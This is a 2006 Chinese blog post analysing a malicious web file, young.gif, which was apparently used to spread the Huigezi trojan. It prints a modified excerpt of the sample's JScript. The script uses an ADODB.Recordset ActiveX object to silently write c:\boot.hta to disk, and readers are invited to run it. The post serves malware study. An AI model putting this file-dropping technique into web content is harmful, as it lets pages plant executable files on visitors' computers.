利用ADODB写文件——恶意文件young.gif代码的分析心得1

利用ADODB写文件——恶意文件young.gif代码的分析心得1

利用ADODB写文件——恶意文件young.gif代码的分析心得1 purpleendurer原创

2006-04-08第1版

对发现一个使用技术升级、下载灰鸽子的网站中的恶意文件young.gif进行了分析和注释，收获颇多。其一便是利用ADODB写文件。

下面的代码是从young.gif中截取、修改的，用来写入文件c:\boot.hta。

<html>

<HEAD></HEAD>

</HTML>

<SCRIPT language=JScript>

try

{

var strHello = 'hello';

//利用ADODB写文件

Rfuc1k1S=new ActiveXObject('ADODB.Recordset');

Rfuc1k1S.Fields.Append('love', 200, 3000);

mike=1;

Rfuc1k1S.Open();

mike=1;

Rfuc1k1S.AddNew();

mike=1;

Rfuc1k1S.Fields('love').Value = strHello;

}

catch(e)

{} Rfuc1k1S.Update();

try

{

Rfuc1k1S.Save('c:\\boot.hta' ,0); //保存为c:\boot.hta

}

catch(e)

{}

</SCRIPT>

</BODY>

</HTML>

把它复制／粘贴到记事本里，保存为HTM文件，双击运行。

看看c:\boot.hta是否出来了？